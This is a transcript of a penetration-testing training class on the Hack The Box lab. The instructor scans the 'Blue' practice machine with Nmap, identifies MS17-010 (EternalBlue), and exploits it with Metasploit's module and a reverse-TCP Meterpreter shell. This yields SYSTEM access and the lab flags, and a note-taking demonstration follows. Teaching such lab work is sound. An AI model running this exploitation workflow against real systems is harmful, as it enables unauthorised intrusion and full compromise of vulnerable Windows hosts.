Yes, yes.
Okay, great. So let's log in here. I already have my account ready. So I'll just log in here with my credentials. Okay. So this is how your interface is going to look like once you log in. Once you are logged in, you need to go to the Access tab. Okay. Let me just try to annotate it here. Here is the Access tab. Just click on it. After clicking on the Access tab, what you need to do is here you will be having your HTTP lab access details. Okay. And you need to download your connection back from here. Okay. Just need to click on this download button. Let me just annotate this as well. Give me a quick second. Where is it? Yeah. So this is the button that you need to click. Okay. Once I'm going to click on it, you'll see a VPN file is going to be downloaded. Just click on save, click on OK. Okay. So this is your VPN file that you need to connect, that you need to use to connect to the labs. Okay. I have already downloaded this lab keys. So let's open my terminal. Now, how can you set up the VPN connection? Let me just do sudo ifconfig, and you can see here, as of now, I only have 3 interfaces here. Now let's go to my directory. Yeah. So you need to go to downloads. Okay, you just need to go to wherever you have downloaded the file. I have my file here. So I'm just going to type sudo open VPN, my VPN file name, press enter, let it run. So it says initialization sequence completed. So the VPN has successfully been connected. I can just confirm this thing here as well. Okay. Now I can see a new interface here, and simultaneously, if I'm just going to click on refresh here, you will see it is going to turn this cross into green tick. Okay. Let me just show you. Just click on refresh, and you can see here that I'm connected now, connected to the VPN. Okay. So let's get back here. Let's open a new tab. Close this thing. Okay, great. So let me just give you a high level overview of what are we going to cover today. For today's session, we are going to look into basically into the exploitation of well-known vulnerabilities, okay, using Metasploit framework. Okay, how can you automate your exploitation of well-known vulnerabilities using the Metasploit? So let's go to Machines tab, click on all. So here you need to go to retired machines. Okay. In the retired machine section, you need to search for blue. Okay. So there's a machine named blue. Let me just search for it. This is the machine here. So what I'm going to do is I'm just going to click on play. What this is doing is, this is going to deploy this machine to my network. Okay. Now this machine is going to be assigned to me for my practice purposes. So let's wait for it to be deployed. Meanwhile, let's click on reset as well, so that a fresh state of this machine is provided to me. So the target IP address is 10.10.10.40. Okay, let's just try to ping it once. And you can see that I'm able to ping this IP address. I'm able to communicate to this IP address. I'm able to get to this IP address. This machine is yet to be reset. So when this machine is going to be reset, this is going to break in between. So there's a new UI of Hack the Box as well. This is the older UI. If you want to access the Hack the Box using new UI, you can click here. Okay, new UI. And there's this cloud version of Parrot OS that is provided by Hack the Box itself. It is termed as Spawnbox. I can click on here. It has certain limitations like number of hours which can be utilized by the individual. So I can just click on start and start using this machine as my attacker machine. We are not going to go this way. This is just an option in case. Okay, so let's get back. Blue is here. So here you can see the machine is reset now. In between it was not reachable. I just stop this ping. Okay. So what I'm going to do here is, let me create a new directory. Let's create a new directory in my temp directory. So let's go there. cd/temp/blue. Now I'm going to create a directory for Nmap. I'm creating this directory for being organized. Okay, I want to be organized. I want to save the Nmap output as well. So that's why I'm creating a Nmap directory here. Created the directory. Now the first thing was the connectivity test that we have successfully done. Now I'm going to scan this machine. Okay, so let's just do Nmap followed by target IP address. Very basic Nmap scan. Let this thing run in behind. Let's open a new tab here and let's run a full port scan here. -p -n -vvv -o capital A Nmap directory. Let's say scan1 followed by target IP address. So how many of you guys understand this these flags which are being used here?
I can understand P for all ports and N for V for version. O and E is O triple V. What is that? Hello?
Anyone else would like to try?
Hello?
Yeah, I can hear you, Dustin. Can you hear me?
Yes, I can. Hyphen P hyphen is all ports can. Okay. And for the hyphen N, I don't know. And hyphen triple V also, I don't know.
And what about, yeah.
Other all, I don't know. Other, I don't know that.
Okay. No issues. What about others? Lakshay, Visakh, do you know what are these flags about?
Scan one, What is scan one? Is it script? Hello.
Nope, that is not a script.
What's this?
So let me just explain this thing to you. Okay. Hyphen P hyphen is for all ports. Okay. Let me just try to do it this way. This is for all ports. Hyphen N is for do not resolve for DNS. That is for hyphen N, like do not resolve this IP address to its name. Do not do that. And hyphen VVV is for verbosity. Okay. Hyphen OA is for outputting the output in a file. A basically means all formats. Okay. Followed by this output. So here what I'm saying is I'm providing with the output file name basically. So here I'm saying that output the scan in the nmap directory and create a new file named scan1 and save it in it. Save it
Okay.
there.
Okay.
Okay. And this is my target IP address. So let's
Okay.
just run this thing. Let it run. Host seems to be down. Meanwhile, here we have certain ports open from our basic scan.
Okay.
So the scan is going to take some time. Let it run in behind. Meanwhile, what I'm going to do is I'm going to run a specific port scan, very specific port scan here, saying nmap hyphen p 135 139 445 49152
Not visible.
49157 output in the nmap directory, and let's make it scan2. Okay, scan2 hyphen smallest capital V hyphen capital O.
Not visible. Hello.
Yeah,
Not visible in the screen.
my command is not visible to you.
Yes. Yes.
Now is it visible?
Yeah. Okay.
Okay. So what I'm doing here is very simply, whatever ports were found open here, I'm
Okay.
just going to run a very specific port scan against them. I'm going to run a OS detection scan hyphen capital O hyphen smallest capital V is for version detection,
Version. Okay. Version.
followed by target IP address. Let's append sudo here. Let's run this thing. Okay. It's only 0.84% complete. Okay, it says filtered. So there's some issue with the scan. Let's run it again. Again, it is showing a filtered. And now it's up and running. इंटरनेट का इशू हुआ. So now what I'm going to show you is I'm going to show you how you can use Nmap for running a vulnerability scan. Okay. Let's wait for the scan to finish. After the scan, we are going to run a VA, some automated VA stuff using Nmap. Okay, so the scan is complete now. And from the OS detection, I can see that, okay, let's go full screen here, that the target operating system is somewhat like Windows operating system. That's one thing, something like Windows 7 to Windows 8, right? Or some Windows Server 2008 server. Okay, and these are certain standard services running on almost every Windows machine out there. So now what I want to do is I want to do a vulnerability scan against this target machine. How I'm going to do this is, let's do, I'm going to use hyphen hyphen script flag followed by vuln. Vuln is for the category of scripts that I want to run. So I want to run all the hyphen hyphen script is for script scan. And what kind of scripts we want to run? I want to run all the vulnerability assessment scripts. That's what I want to run. And when I say script scan or running these scripts, where are these scripts? What are these scripts? Can anyone tell me? Can anyone tell me what all scripts are going to be executed behind the scenes? So there is something known as NSE. NSE is your Nmap scripting engine. And the scripts are stored in user, share, Nmap, ls, cd scripts, ls. And here you can see there are a lot of scripts here. Okay. So these scripts fall under variety of categories. Let me just try to read one of them. Let's say FTP non.nsc. I just try to read the script here, and this is the output here, you can see. So first thing, what is this language which is being used here? Can anyone tell me? Nmap NSE scripts are written in which language?
Java.
Sorry?
JavaScript.
JavaScript.
No.
Nope, this is not it.
Python.
No, this is not Python syntax. This is actually Lua, Lua.
Lua.
Yeah. So Lua is a programming language. So if you want to understand these scripts, read these scripts, you can learn Lua. And if you want to create your own custom scripts, you need to learn Lua, okay, so that you can modify these scripts, run these scripts, or uh, you can create your own custom scripts. Okay.
Okay.
As of now, we do not need that stuff. What we just need to do is we just want to run this script.
Okay.
So all of these scripts are divided into some categories. Okay, they fall under certain categories. So let me just show you. Where is it? There's going to be a category section here. Nope, nope. It is not here. Yeah, here it is. Right. So these are some default, by default categories which are available. Okay, so this script falls under the safe category, auth category, and default category. Let me just try to read some other script here. Let's say, so here you can see that I try to read the script, and this script falls under the category of VULN. Okay, so VULN is the category which are going to be used for referring to the vulnerability detection scripts. Okay, so now when I'm going to run this command over here, this is going to run all those scripts which falls under the VULN category.
Okay.
Okay, so let's run this thing. Let's just save the output in scan3 VULN and press enter. So that is nothing but the output file name. I can just change it as per my needs. So we are waiting for the scan to finish. It's already 87% done. Okay, so the scan is finished now, and let's try to go through the output. Running some scans here, nothing here. Host script results. Okay, so the key things to observe here is this one. This is the vulnerability name. It says MS17010, and the state is vulnerable. Okay, so what do we understand here? Nmap has did the basic VA, and Nmap is telling me that the target is vulnerable to a remote code execution vulnerability, and the vulnerability name is MS17010. Can any one of you tell me what is the name of this vulnerability?
Samba, right? Samba, SMB,
Hmm?
SMB, right? SMB,
Yeah,
security, right? ID CVV, yeah, this one. CVE 2014. Hello?
yeah.
SMB, right? SMB. The name,
SMB is the service. Okay.
uh, Eternal Blue.
So essentially, let me tell you, this is a very famous vulnerability. Okay. And this
Okay.
MS17010 is renowned for Eternal Blue. Okay, Eternal
Okay.
Blue is the name given to this vulnerability. Okay, I can just do a Google search over here. Eternal Blue. Hmm. And if I just search here, or I can just search for MS17010. Okay, I can read more about this vulnerability here. And here you can see that it's also known as Eternal Blue, right? Okay, so now what we are going to do is we are going to use Metasploit framework for our automated exploitation of this vulnerability, that is Eternal Blue. Let's look into it. So the name of this machine itself was giving us a hint about the vulnerability, right? The name of the machine is Blue, and the vulnerability that we are going to exploit is Eternal Blue. So let's go here. Let's do a clear screen. Sudo msfdb start. Let's start my Metasploit framework. Okay, so I'm inside Metasploit framework. Now what shall I do? Can anyone tell me? I want to exploit this vulnerability MS17010. what is going to be my next step?
We need to search MS-17.
Right, just search for it.
Search for the exploit. Hello?
Yeah,
Yes.
so I just searched for this vulnerability. Just typed search here, search MS17010, and here are a bunch of options out there. Okay, so what all do we have here? What all options do we have here? We are not concerned about the auxiliary modules. So auxiliary modules are basically there for the scanning purpose. We are here for the exploitation purpose. So let's do one thing.
Eternal
Let's
blue.
right
Those.
eternal blue. Okay. So let's try to use our first
Oh,
exploit over here.
yeah.
Let's try to use this one. Okay. So select this thing, copy it, just type use and paste your exploit here. Use exploit Windows SMB MS17010 eternal blue and press enter. No payload configured, default into Windows 64 Metapredator reverse TCP. Okay. And let's now configure our exploit here. So just type show options. And here I need to mention the required fields. Okay. So the required fields are the rhost, set rhost, that is 10 10 10 40, I believe.
Yes, yes, 40.
Just confirm it.
40, 40.
Yeah. Just type show options. Lhost is something that I need to change here. I can see it is not my IP address. So let's change it. Let's open a new tab. Check my IP address. That is 10 10 14 11. Set lhost 10 10 14 11. Okay. Let's just check the updated settings. So I have successfully configured the machine. Okay. Sorry, successfully configured the exploit. Now let's run this exploit and see what happens. Let's just type run. Okay. Exploit is working. And here I can see Metapredator session 1 opened. Okay. 10 10 14 11 444. And okay, Metapredator is here. Let's just type help. I have a shell on the target system. Okay. And it's a Metapredator shell. Okay. Let's try to get GUID. Okay. Okay. UID is not here. So it's a Metapredator shell. So normal Windows or Linux commands are not going to work here. only these commands are going to work here, which are understood by the interpreter shell. Okay. Or else if I want to go get a standard Windows shell, what I can do is, first of all, let me type get UID here. When I type get UID here, I can see I am NT authority system here. Okay. And what is the topmost user? Who is the topmost user in Linux?
Linux root. Right?
That is root in Linux, right?
Root, yes.
And what about the topmost user in Windows?
This is
Admin.
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 Okay, so in Windows, the topmost user is NT authority system. Okay. This is the topmost user here. So as you guys can see now that I am currently having a shell with this privileges. So that means that I have successfully compromised this machine with the highest level of privileges which are available here. Okay. So let's do one thing. Let's just click get my shell, standard Windows shell here. Okay. So I just typed shell over here so that it's converted to standard shell. So did whoami works here? Whoami works here. I am NT authority system here. Okay. Let's get back and let's do dir cd users dir cd. Harris is a user here. Okay, I can see Harris is a user on this machine. Okay, so let's go into its directory. What do I have here? Bunch of directories here. cd, let's do desktop. And I have a user.txt file here. Okay. So how can I read this file now? Can anyone tell me? I want to read this text file. How can I read it?
Download it and read.
Download. I want to read this file.
Okay. Cannot download? Is it possible?
I want to read it in my terminal here itself. I do not want to download locally to my Kali and then do anything. So I can type user.txt and this is going to, so type is like equivalent, cat equivalent in Windows. Okay.
Okay.
Just like you do cat in Linux, here we do type.
Okay.
This is the user flag with us. Let's just copy this thing and go to my panel over here. Where is my blue machine? There is my blue machine. And just click on this flag icon here, submit flag. Click here and paste the flag. Assign the difficulty, whatever you faced, whatever you felt like, and click on submit the flag. Okay. Right guys, so similarly, this was your user flag. Once you have submitted your user flag, your this gray color is going to be turned into color blue, and this gray color is going to be converted into red once you submit the root flag. So let's get the root flag as well. It is going to be in the admin directory. dir cd cd desktop dir type root.txt. Let's press enter. Simply copy this thing and paste it over here. Click on submit flag, and you have successfully compromised this machine. It was a very easy machine. As you can see, a lot of people have compromised this. Okay, this is the count of people who have successfully compromised this machine. Okay,
Okay.
so the whole motive here was to use Metasploit for known vulnerabilities, searching for known vulnerabilities. Okay, using Nmap for doing basic vulnerability assessment. Okay, where was it? So our full port scan is still running, and it is only 7% done. We are not yet done with the full port scan yet. And okay, and here we can see that we have successfully compromised the machine. Now let me just share with you certain tips for documenting these steps, how you are going to document your steps, because in penetration testing, report writing is also very important. Okay, so let's just search for, what is it, cherry tree CTF notes. Just click on save file, save it. Okay, I already have it downloaded here, CTF template. Let's just click on it. Okay, so this is a template that you guys can use for documenting your steps. Okay. How are you going to document your steps? Starting from here. So this is an application known as Cherry Tree. Okay. Have you guys used Cherry Tree before?
No. Not yes.
Okay. So it's an inbuilt utility in Kali Linux. It is used for notes taking your notes. Okay.
Okay.
For report writing and all that stuff. So in here, you can organize your notes in a very well structured manner. Okay. So here we already have this template. What I can do is I can just simply click on new instance, and this is a fresh instance of Cherry Tree. When you are going to open it, this is going to open this way. Just click on no tree, click on add node, and here I can say, let's say blue. Clicked on blue. This is my, let's say, machine. I can create a subnode over here. Let's say add subnode. Let's do port scan. Okay. and I can take a record of whatever port scan I have done here. Let me just show you how. So let's go here. Let's get back to my port scan over here. So there are multiple ways. One way is to by simply copying your output from the terminal. Just click on copy and go here and paste it. This is one way of taking the notes. Okay. Another way is by taking the screenshots, okay, of this stuff time to time. So how can I take a screenshot of this part only? In Kali Linux, the shortcut is going to be Control Shift Print Screen. I press Control Shift Print Screen and just drag the part you want to select, dragged it, come here, paste it, just do Control plus V, and the snap is here. Okay, so this way you can document all your steps, whatever you have done so far. Okay, and so that you do not need to create these nodes and child nodes by yourself, like you do port scan here, then you create a new node here, like doing let's say identify vulnerability, and then create a node here like exploiting it, and then something like user shell, and then something like root shell. Okay, instead of doing all this stuff, what I have done here is there's a pre-made template here. Okay, so whenever you are tackling any machine out there, what you can do is you can use this template to document your steps. Okay, so like just change the node properties here, do 10 10, this is my target, 10 10 10 40, and name it as blue as well, blue HTTP enumeration TCP. In TCP enumeration I found these ports first of all, so let's take a note of this. Okay, paste it, and then once I was done with this, I did a version detection scan and OS detection here, so I can take a screenshot of this as well, and I'm going to paste it here again. Along with this, I can keep a record of the commands that I am using. So I can just paste the command in plain text here. Let's get back. Then I did a vulnerability scan here. So let's just get this as well and get the output. So the output is like this. Just paste it here. Okay. And here I can say, I can just create a child node of TCP here. Okay. Add subnode and just create findings. And I was able to find the MS17010 vulnerability found. Okay, verify it, exploit it. So this was a very simple machine. There was nothing complicated here. There were not more than one vulnerabilities. Okay, so in that case scenario, it is pretty easy. But if there are multiple services running, multiple TCP ports open, okay, and there are multiple ways of gaining access to a system, so that way this note taking habit is going to help you out a lot. Okay. Similarly, I did not do or performed any UDP port scan here. Okay, so I do not have any screenshot to put here, nothing here. So I can just do as UDP not performed. And if there would have been any web server running on my target machine, then I would have used this subnode perform the Nikto, perform the Durbuster, directory brute forcing, what kind of CMS is running there. I could have taken the notes of those systems as well and taken a screenshot of them, organized them here. Some other miscellaneous services found SMB, SNMP, DB, other exploitation. Okay, service exploited. So I can mention here like SMB version 1, vulnerability type RCE, N RCE, eternal blue. I can say MS17010, and I can even mention the CV details here. Okay. Exploit POC, used MSF. Okay. Exploit description, what it was, how I used. So I did not use any exploit code here. I did not perform these steps because I use the automated way out using the MSF. So I need to document these steps as well. Like I opened the Metasploit framework here, and then I searched for the vulnerability here. Let's just take a note of this as well. In exploitation only, exploit code used. Let's paste it here. So use Metasploit framework. Okay, and I did show options. I changed certain settings here, so I'll take a note of this as well. I did set lhost, set rhost, set lhost, and just paste it over here. And then I clicked on run. Shell opened here, and then at last I need to take a note of the user that I am here. So I can just do a who am I screenshot here. Where is it? Yeah, here it is. Get UID to here. Just save it. So that's how you can document your steps, what you did after post exploitation, privilege escalation, anything else you were able to find on the system. Okay, software version, methodology, logbook. Okay, you can just use this tracker to perform to keep a note of what you did and what you didn't. Okay, so okay, so this thing is clear, the exploitation part and the reporting part. So I've shared this template in the chat. That's one thing. Okay. This is one option. There's another option as well available to us. That is this one. I'll just share it in the chat as well. So you can use any one of these templates that are available. I have downloaded this one as well. Let me show you. This is another template that you can use. So this is just like another way of organizing your stuff, nothing else. Okay. Identify port, exploiting user shell name, host, enum. So whatever suits you, you can use. Let's just close it. Close this one. Nope. Okay. Along with that, let me just share some sample and test report for your reference. So what I'm going to do is I'm not going to take notes of each and every machine that we are going to compromise. Okay. In between, someday I'll be taking notes. I'll show you how I'm documenting stuff. Okay. Because that is going to slow down my pace as well. Because I'm going to pause in between again and again, take a snap, save it in the report. Okay. So the good practice is whatever you are doing, just start documenting it side by side. Do not wait for your pen test to complete and then start documenting it. Okay. Okay. So here I'll be sharing the report templates, some sample report templates as well for your reference. Okay, poor internet, not able to load this PDF. Well, anyways, I'll just share this link in the chat. Okay, you guys can have a look here. Okay. Still not loaded. Let's copy this, paste it in the chat. Here you have some sample reports as well. Okay, something to refer. Okay. Now in the initial sessions, okay, not throughout the course we are going to use the Metasploit. Okay, this, so we are going to use Metasploit here and there, a little bit here, a little bit there, and we are going to see the manual exploitation phase more than the automated one. Okay, because see, you can see here the manual exploitation was very easy. Okay, and for manual exploitation the only thing that you need to know is how to use Metasploit. Okay, we are going to look into the uh, manual exploitation way. Okay, so I believe I said manual exploitation way with the Metasploit as well. So the Metasploit is for automated PT. Okay, and in the manual exploitation way, you would be able to understand the vulnerability, what we are exploiting, how we are doing it, and foremost why we are doing it. Okay, now there's a homework for you guys, and it's very easy. If you guys are not going to do it, then we are going to do it in the next session. So once you are done with the machine, you need to click on stop. I hope I am audible to everyone. Guys, can you hear me?
Yes, yes.
Okay, good. So once you're done with the machine, you need to click on stop.
Okay.
Okay, that's one thing, because at a given point of time, you can only have a single machine deployed to your lab environment. Once you're done with Blue, okay, just try to go through all the steps that I have done in the class. Once you're done with that, just repeat the same steps for another machine, that is legacy. This is the machine. Okay, let me just mark it. This is the machine. Okay, legacy, and the IP address is 10.10.10.4. Deploy the machine in your lab environment, do a Nmap scan, do a automated vulnerability scan using Nmap. You will find a vulnerability there. Search for that vulnerability. It's a very well-known vulnerability. Search that vulnerability in the Metasploit framework, set the exploit, configure the exploit, modify it, and run it, and you will get a shell back. Read the flags, user flag and the root flag, submit it here, and you are done with this machine. Okay. And I believe if you have already done the blue machine, after that it is only going to take you 10 to 15 minutes to complete the legacy machine. Okay. So it's not that extensive, pretty easy peasy stuff. Okay. Once we are done with legacy, we are going to cover Devil. Okay, this is the one 10.10.10.5 Devil. And for Devil as well, we are going to look into the Metasploit using the Metasploit only. But what we are going to focus upon is how we can do privilege escalation using Metasploit framework. Okay. After Devil, I will try to restrict myself from using Metasploit and will try to cover everything in manual way. Okay.
Okay.
Until unless it is not absolutely necessary to use. Okay. So any doubt so far?
I have a doubt. When we scan, we got of version. It's
Yeah.
showing Windows. So many options it's displayed. So it's so many Windows versions.
Windows version, yeah, I remember,
Yes.
right.
Yeah. So
Detection.
so this is one computer or it's the group of computer. See the
This is a single computer.
single computer. Okay.
Yeah, so the point is that Nmap is not able to identify the target operating system very precisely.
Okay.
Okay, so what Nmap do is Nmap tries to guess the operating system.
Okay. Okay.
Getting my point? So what here Nmap is doing, Nmap is just trying to guess. Like Nmap is saying that I have 99% confidence that it's a Windows 7.
Windows 7 or Windows.
Or
This
it
is
may
the
be,
options. Yeah. Maybe Server 2008,
yeah.
Windows
So
8. Yeah. Yeah.
right.
Okay.
So the only,
Discuss. Okay.
yeah. So the only point of using OS detection scan is we do not want to know the exact version or exact build of the operating system. We just want to understand that if we are trying to target a Windows or we are trying to target the Linux, because the exploitation is going to vary, right?
Okay. Right.
That is our motive for using OS detection.
That's right. Okay.
Okay, we are not trying to identify the exact version here,
Okay. Okay. Fine.
right?
Right.
That's one thing. Okay. And talking about the fact that we have got a new joinee over here, that's Lakshay, and he has probably missed our yesterday's session. So in yesterday's session, we did not discuss anything technical. Okay, I just gave a high level overview of what we are going to cover in our upcoming training. Okay, what you can expect out of the training and what you guys need to do. So I just gave the instructions to sign up here on the Hack the Box platform, create an account here, get a VIP subscription, which is going to cost you around 10 euros, probably 800 to 900 rupees per month. And we are going to use the Hack the Box lab environment for our practice purposes. Okay, for throughout the course. That's what we are going to do. And in total, I believe we have 7 students in the batch. Okay, a lot of students have not joined today and yesterday as well. Let's see when they are going to join. Anyways, any other query or any other doubt? Anything else that you guys want me to clarify? Hmm? Anything else you guys need help?
So maybe need help when we need to start the work. When I start the assignment, so I can get more doubts, and then I can ask you.
Right,
Now
right.
we understand. Okay, so how to do it. Okay, but when I am starting to do, I can get more doubts or
Absolutely, absolutely. So this is something that I also want to iterate, that whatever we are going to cover, okay, things are not going to be that easy like today. Okay, like uh, it's like for today's session it was very easy. It was the ABCD. For
okay.
upcoming session, I expect you guys to practice it parallelly, because if you guys are not going to practice it, the clarity is not going to be there. Okay, so that's the thing, and that's all. And that would be all for today's session as well. Okay, if you guys, yeah, one more thing that I would like to share is, uh, there are certain uh, things that you should know, that is PyR2 Linux privilege escalation guide, got milk privilege escalation. So these are certain guides that we are going to refer day in and day out. Okay, for our privilege escalation purposes. And other than this, I would like you guys to read TJNL or CP. Okay, and you can refer to this link as well for more study purposes. This thing. Okay. So whatever I'm going to use is, it's going to be available readily on the internet. Okay. And with passage of time, I'll be sharing few notes here and there. For the timing, for privilege escalation, just go through this stuff. Okay. The guide I have shared, at least go through the PyR2 guide. Okay. This is the brief version of privilege escalation. This is the detailed version of privilege escalation. Okay. So at least go through this thing, the PyR2 one. Okay. And go through this guide as well, TGNL Journey to Try Harder preparation guide for PWK-OSCP. Okay. So although this is not an OSCP training, this is for penetration testing, you can say, or ECSA training, but still what we are going to try to do here is we try to cover stuff in a way that you guys can go for, after completing this training, you guys can opt for the OSCP as well. Okay, so that is our end goal here. That is our mindset here. Okay. A lot of resources are mentioned here in this guide. Okay, you can see a lot of resources are here. Okay, all right. Yeah, anything else you guys want to ask from me? Yeah, Visak, are you saying something? Because I'm not able to hear anything. This is an image that you guys can keep for your reference. As I've already talked about this image in yesterday's session, we are going to cover 6 machines from Windows, 6 machines from Linux. In total, we are going to cover 12 machines from here, from these lists. Okay. Okay, so then I believe if you guys do not have any more doubts, let's just close this thing. That would be all from my side. Have a great day ahead, guys. Take care, and we'll catch up on Monday then. Okay. Bye bye.
Hello.
Yeah.
So can you send me these links which you send it to me in the chat? Can you send it to by email?
To the email.
Because I copy and paste. I cannot change my window when this is the screen. The Zoom screen, I cannot change it now, right now.
Okay.
Okay. So yeah, yeah. Okay, now I can. Because if you close it, I cannot copy that links.
Not an issue. So this link is going to get expired in 1 day. Okay. And so just take a note of this link. Okay. You can just click a picture of this link.
Yes, copy.
Done?
Yeah, done.
Okay. Have a great day ahead. You're most welcome, guys. Thank you for joining in. And we'll meet on Monday then. Take care. Bye bye.
Okay, bye bye. Thank you.
Yeah.